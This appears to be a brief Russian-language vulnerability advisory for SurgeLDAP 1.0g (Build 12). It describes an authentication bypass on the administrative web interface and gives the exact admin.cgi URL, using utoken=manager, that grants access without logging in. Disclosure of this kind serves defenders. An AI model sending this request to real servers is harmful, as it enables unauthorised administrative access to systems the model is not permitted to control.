Программа: SurgeLDAP 1.0g (Build 12)
Уязвимость аутентификации обнаружена в SurgeLDAP. Удаленный пользователь может получить доступ к административному Web интерфейсу.
Удаленный пользователь может обойти процесс аутентификации на административном Web интерфейсе используя следующий URL:
http://127.0.0.1:6680/admin.cgi?cmd= show&page=main.tpl&utoken=manager
